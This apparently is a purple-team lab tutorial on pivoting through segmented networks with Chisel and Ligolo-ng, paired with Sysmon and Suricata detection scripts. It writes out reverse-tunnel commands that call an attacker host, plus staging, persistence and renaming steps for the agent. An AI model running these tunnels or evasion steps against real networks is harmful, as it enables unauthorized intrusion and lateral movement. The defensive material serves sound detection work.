Pivoting with Chisel and Ligolo-ng: Segmented Networks in a Pentest Lab
How to pivot across VLANs using Chisel and Ligolo-ng in a controlled lab, and which artifacts the blue team can capture to detect the reverse tunnel.
Your DMZ shell is worth zero if you cannot reach the internal VLANs where the domain controller lives. In the Basilisk OffSec lab we built exactly that scenario: a Linux host exposed on 10.10.1.0/24, an internal segment 10.10.30.0/24 with a Windows 11 workstation, and Active Directory on 10.10.40.0/24. The only viable route into those segments runs through that pivot box, and that is where Chisel and Ligolo-ng come in as complementary tools. Before writing a single payload byte, walk through Web Pentesting From Scratch: Building a Safe Lab with DVWA, Juice Shop and Burp Suite to confirm your lab is firewalled off from your home network by pfSense.
Chisel solves the basic problem: the pivot has HTTP egress to your C2, but ingress is closed. Run a Chisel server on the attacker (chisel server --port 443 --reverse --tls-key key.pem --tls-cert cert.pem) and the client on the pivot (chisel client https://attacker.tld:443 R:1080:socks), and the server side now exposes a SOCKS5 listener on 127.0.0.1:1080 whose traffic rides the reverse tunnel into the pivot's network; point proxychains at it and your tools on Kali reach the internal segments. The transport is a WebSocket over TLS on 443, which is almost always allowed outbound. In real engagements against Squid and Zscaler corporate proxies we measured under 8% block rate when the certificate carried a coherent SAN (the client can also pin the server with --fingerprint, so a TLS-intercepting proxy breaks the tunnel instead of silently reading it). The pattern has its own noise: the connection is a long-lived HTTP/1.1 Upgrade that an inspecting proxy sees directly, and the Go TLS stack's ClientHello yields a JA3 fingerprint that no browser on the host shares, so even a passive sensor gets a handle on it.
Ligolo-ng raises the bar because it creates a TUN interface on the attacker and routes whole packets, not just TCP streams through SOCKS. Create the interface on Kali (sudo ip tuntap add user $(whoami) mode tun ligolo; sudo ip link set ligolo up; recent releases can do this from the proxy shell), run the proxy (./proxy -selfcert -laddr 0.0.0.0:11601), execute the agent on the pivot (./agent -connect attacker.tld:11601 -ignore-cert), then in the proxy shell select the session, run ifconfig to list the agent's interfaces, and start the tunnel (start, or tunnel_start in older releases). From that point, a plain ip route add 10.10.30.0/24 dev ligolo on Kali lets you run nmap, CrackMapExec, even Impacket without proxychains. The agent itself installs no driver and needs no elevated privileges: the proxy reads packets off the TUN and the agent turns them into ordinary sockets on the pivot. Liberating, yes, but the IoC surface grows: the pivot now originates ICMP, UDP, and TCP toward hosts it never spoke to before, which lines up cleanly with the detection rules covered in Lateral Movement in the Lab: SMB, WMI and WinRM with a Detection Focus.
On the offensive side, the sequence we use in the lab on the Windows 11 host is: initial access via an Office macro documented in Simulated Initial Access: Macros, LNK and ISO in an Isolated Windows 11 Lab, a Sliver beacon as test shell (see Building C2 Infra with Sliver in an Isolated Lab for Defensive Research for the setup), then staging the Ligolo agent through the Background Intelligent Transfer Service (BITS) so that no process of ours performs a direct download. The agent lives in a writable directory like C:\Users\Public\Downloads, persisted as a low-priority scheduled task. Critical detail: compiling the agent with -ldflags="-s -w" strips symbols and debug info, which only shrinks the static signature, and renaming it to svchost-helper.exe will not fool modern EDR; Sysmon Event ID 3 records that process reaching an unusual port within seconds when the rule is written right.
On the defensive side, and this is where the exercise turns into purple team gold, you hunt for three things. First, persistent outbound connections to 443/11601 lasting over 30 minutes from hosts that historically only make short Microsoft 365 requests. Second, unsigned processes that open a TLS session without ever loading Schannel or WinINet/WinHTTP (Ligolo and Chisel are Go binaries and carry their own TLS stack, so the native DLLs never appear in their image loads). Third, and contrary to a common assumption, Ligolo-ng creates its TUN interface on the attacker, not on the pivot, so a rule for TUN/TAP interface creation on Windows endpoints will not fire for it (keep that rule for pivots that do install a driver). What the pivot does expose is a sudden fan-out: ICMP, UDP and TCP from one workstation to many internal hosts and ports it never touched before, a rare enough shape to anchor a high-confidence Sigma rule. Wire that into Threat Hunting with Sigma and Elastic: From Indicator to Detection Rule and you have detection-as-code that survives many different pivot shapes.
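The second hunt above, unsigned processes that speak TLS without the Windows TLS stack, can be written as a correlation over Sysmon telemetry. The script below is an added example written for this article, not tooling from the Ligolo-ng or Chisel projects: it pairs Event ID 7 (image load) with Event ID 3 (network connect) per ProcessGuid and flags any process that reaches a TLS port without having loaded schannel.dll, wininet.dll or winhttp.dll. The sample records are constructed, and the IP addresses come from the documentation ranges; the GUIDs and paths are placeholders. Sysmon must have image-load logging enabled for Event 7 to exist, and the lookback must include the process start, or a process that loaded Schannel before the window opened will be misclassified.

```python
"""Added example (not the article's or the projects' own code): correlate
Sysmon Event ID 7 (image load) with Event ID 3 (network connect) to flag
processes that reach a TLS port without ever loading Windows' native
TLS/HTTP stacks. A Go binary such as a Ligolo-ng agent or Chisel client
ships its own TLS implementation, so schannel.dll, wininet.dll and
winhttp.dll never appear among its image loads."""
import json
from collections import defaultdict

# Ports the hunt watches: 443 (Chisel over TLS) and 11601 (Ligolo-ng default).
TLS_PORTS = {443, 11601}
# DLLs a process using the Windows TLS/HTTP stack loads; their absence
# together with a TLS-port connect is the signal.
NATIVE_TLS_DLLS = {"schannel.dll", "wininet.dll", "winhttp.dll"}

# Constructed Sysmon records (JSON Lines, EventData fields only), NOT real
# telemetry: OUTLOOK.EXE behaving normally, a renamed Ligolo-ng agent, and an
# unrelated SMB connection that is outside the watched ports.
SAMPLE_EVENTS = r"""
{"EventID": 7, "ProcessGuid": "{A1}", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "ImageLoaded": "C:\\Windows\\System32\\schannel.dll"}
{"EventID": 3, "ProcessGuid": "{A1}", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "Initiated": "true", "DestinationIp": "198.51.100.20", "DestinationPort": 443}
{"EventID": 7, "ProcessGuid": "{B2}", "Image": "C:\\Users\\Public\\Downloads\\svchost-helper.exe", "ImageLoaded": "C:\\Windows\\System32\\ws2_32.dll"}
{"EventID": 3, "ProcessGuid": "{B2}", "Image": "C:\\Users\\Public\\Downloads\\svchost-helper.exe", "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 11601}
{"EventID": 3, "ProcessGuid": "{C3}", "Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": "true", "DestinationIp": "10.10.40.5", "DestinationPort": 445}
"""


def parse_events(ndjson):
    """Parse JSON Lines into dicts, skipping blank lines."""
    return [json.loads(line) for line in ndjson.splitlines() if line.strip()]


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_self_contained_tls_clients(events, ports=TLS_PORTS):
    """Return one finding per process that initiated a connection to a watched
    port without loading any of NATIVE_TLS_DLLS in the same event window."""
    loaded = defaultdict(set)     # ProcessGuid -> set of loaded DLL names
    connects = defaultdict(list)  # ProcessGuid -> Event 3 records of interest
    for ev in events:
        guid = ev["ProcessGuid"]
        if int(ev["EventID"]) == 7:
            loaded[guid].add(_basename(ev["ImageLoaded"]))
        elif (int(ev["EventID"]) == 3
              and str(ev.get("Initiated", "true")).lower() == "true"
              and int(ev["DestinationPort"]) in ports):
            connects[guid].append(ev)

    findings = []
    for guid, conns in connects.items():
        if loaded[guid] & NATIVE_TLS_DLLS:
            continue  # used Schannel/WinINet/WinHTTP: an ordinary Windows TLS client
        findings.append({
            "process_guid": guid,
            "image": conns[0]["Image"],
            "destinations": sorted({f'{c["DestinationIp"]}:{c["DestinationPort"]}' for c in conns}),
            "dlls_loaded": sorted(loaded[guid]),
        })
    return findings


if __name__ == "__main__":
    for finding in find_self_contained_tls_clients(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(finding, indent=2))
```

Only the renamed agent is reported: Outlook loaded schannel.dll before its 443 connect, and the svchost.exe SMB connection is outside the watched ports. In production the same join runs in the SIEM (Elastic, Sentinel) with the process start time as the lower bound of the image-load lookup.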
Logs are your judge. In the lab we captured PCAP on the firewall with Suricata in IDS mode, and the heuristic that caught Ligolo best combined a TLS ClientHello whose JA3 hash was not on the allowlist, an average packet size between 1200 and 1400 bytes over the flow, and a missing SNI for the destination. Chisel hid a bit better because its transport is a genuine WebSocket over TLS and looks like ordinary web traffic, but it leaked through session duration. To round out the investigation, pull a memory image from the pivot post-incident and cross-reference it with Memory Forensics with Volatility 3: Analyzing Dumps in a Reproducible Lab using the windows.netscan plugin; the socket and its owning PID show even if the agent was injected into another process.
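The Suricata heuristic just described, together with the session-duration hunt from the defensive section, can be expressed as a scoring pass over EVE JSON. What follows is an added example for this article, not part of Suricata or of either pivot tool: it joins each tls event with the flow event sharing its flow_id, computes the average packet size and the session duration from the flow counters, and emits a verdict per flow. The JA3 allowlist, the three flows and the hashes are constructed (the documentation IP ranges stand in for the attacker and for Microsoft 365); the thresholds are the ones the text gives.

```python
"""Added example (not from the article or from Suricata): score Suricata EVE
JSON records for the reverse-tunnel heuristics. Each 'tls' event is paired
with the 'flow' event that shares its flow_id, then checked for a JA3 hash
outside the allowlist, a missing SNI, a Ligolo-like average packet size,
and a long-lived session."""
import json
from collections import defaultdict
from datetime import datetime

# Assumptions, constructed for the example: JA3 hashes observed from the
# estate's browser/Office builds, and the thresholds quoted in the article.
JA3_ALLOWLIST = {"a1b2c3d4e5f60718293a4b5c6d7e8f90"}  # placeholder, not a real hash
SIZE_RANGE = (1200, 1400)     # average packet size in bytes seen for Ligolo
MIN_TUNNEL_SECONDS = 30 * 60  # "over 30 minutes" long-lived session threshold

# Constructed EVE records, NOT a real capture: a short Microsoft 365 session
# (flow 1), a Ligolo-ng agent session (flow 2) and a Chisel session (flow 3).
SAMPLE_EVE = r"""
{"event_type":"tls","flow_id":1,"src_ip":"10.10.30.15","dest_ip":"198.51.100.20","dest_port":443,"tls":{"sni":"outlook.office365.com","ja3":{"hash":"a1b2c3d4e5f60718293a4b5c6d7e8f90"}}}
{"event_type":"flow","flow_id":1,"src_ip":"10.10.30.15","dest_ip":"198.51.100.20","dest_port":443,"flow":{"pkts_toserver":40,"pkts_toclient":38,"bytes_toserver":12000,"bytes_toclient":30000,"start":"2024-05-01T11:00:00.000000+0000","end":"2024-05-01T11:02:00.000000+0000"}}
{"event_type":"tls","flow_id":2,"src_ip":"10.10.30.15","dest_ip":"203.0.113.10","dest_port":11601,"tls":{"ja3":{"hash":"ffffffffffffffffffffffffffffffff"}}}
{"event_type":"flow","flow_id":2,"src_ip":"10.10.30.15","dest_ip":"203.0.113.10","dest_port":11601,"flow":{"pkts_toserver":4000,"pkts_toclient":3000,"bytes_toserver":5200000,"bytes_toclient":3900000,"start":"2024-05-01T10:00:00.000000+0000","end":"2024-05-01T10:45:00.000000+0000"}}
{"event_type":"tls","flow_id":3,"src_ip":"10.10.30.15","dest_ip":"203.0.113.10","dest_port":443,"tls":{"sni":"attacker.tld","ja3":{"hash":"ffffffffffffffffffffffffffffffff"}}}
{"event_type":"flow","flow_id":3,"src_ip":"10.10.30.15","dest_ip":"203.0.113.10","dest_port":443,"flow":{"pkts_toserver":6000,"pkts_toclient":5800,"bytes_toserver":3600000,"bytes_toclient":3480000,"start":"2024-05-01T09:00:00.000000+0000","end":"2024-05-01T10:30:00.000000+0000"}}
"""


def parse_eve(ndjson):
    """Parse EVE JSON Lines into dicts, skipping blank lines."""
    return [json.loads(line) for line in ndjson.splitlines() if line.strip()]


def _ts(value):
    """Suricata timestamps look like 2024-05-01T10:00:00.000000+0000."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f%z")


def score_flows(records, allowlist=JA3_ALLOWLIST):
    """Join tls+flow events per flow_id and return one scored entry per flow."""
    by_flow = defaultdict(dict)  # flow_id -> {event_type: record}
    for rec in records:
        by_flow[rec["flow_id"]][rec["event_type"]] = rec

    results = []
    for flow_id, evs in by_flow.items():
        tls_ev, flow_ev = evs.get("tls"), evs.get("flow")
        if not (tls_ev and flow_ev):
            continue  # need both the handshake and the flow summary
        t, f = tls_ev["tls"], flow_ev["flow"]
        pkts = f["pkts_toserver"] + f["pkts_toclient"]
        avg_size = (f["bytes_toserver"] + f["bytes_toclient"]) / pkts if pkts else 0
        duration = (_ts(f["end"]) - _ts(f["start"])).total_seconds()
        hits = {
            "ja3_not_allowlisted": t.get("ja3", {}).get("hash") not in allowlist,
            "missing_sni": not t.get("sni"),
            "ligolo_like_packet_size": SIZE_RANGE[0] <= avg_size <= SIZE_RANGE[1],
            "long_lived": duration >= MIN_TUNNEL_SECONDS,
        }
        verdict = None
        if hits["ja3_not_allowlisted"] and hits["missing_sni"] and hits["ligolo_like_packet_size"]:
            verdict = "ligolo_like_tunnel"       # the three-part heuristic from the text
        elif hits["ja3_not_allowlisted"] and hits["long_lived"]:
            verdict = "long_lived_tls_session"   # how Chisel leaked: duration
        results.append({
            "flow_id": flow_id,
            "src": flow_ev["src_ip"],
            "dst": f'{flow_ev["dest_ip"]}:{flow_ev["dest_port"]}',
            "avg_pkt_bytes": round(avg_size),
            "duration_s": duration,
            "hits": hits,
            "verdict": verdict,
        })
    return results


if __name__ == "__main__":
    for entry in score_flows(parse_eve(SAMPLE_EVE)):
        print(json.dumps(entry))
```

Run over the constructed records, flow 1 gets no verdict, flow 2 is reported as ligolo_like_tunnel (unknown JA3, no SNI, 1300-byte average) and flow 3 as long_lived_tls_session (unknown JA3, 90 minutes). The allowlist is the weak link: populate it from a baseline window of the same sensor rather than from a public JA3 list, and expect a reflow when the browser or Office build updates.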
Ethics and scope are not an addendum, they are the foundation. None of this makes sense outside a lab you own, a signed contract, or an authorized range like HackTheBox Pro Labs and OffSec PG Practice. Documenting exact commands, binary hashes, and execution windows protects you and your client. Before deploying Ligolo on a real engagement, revisit your personal posture with OPSEC for Security Researchers: Building a Personal Threat Model and keep your research box separate from your client box. Practical takeaway: stand up the lab today with three VMs and a pfSense, drop Chisel and Ligolo in the same day, and spend the rest of the week writing the Sigma rule that catches yourself. Only then do you really understand the technique.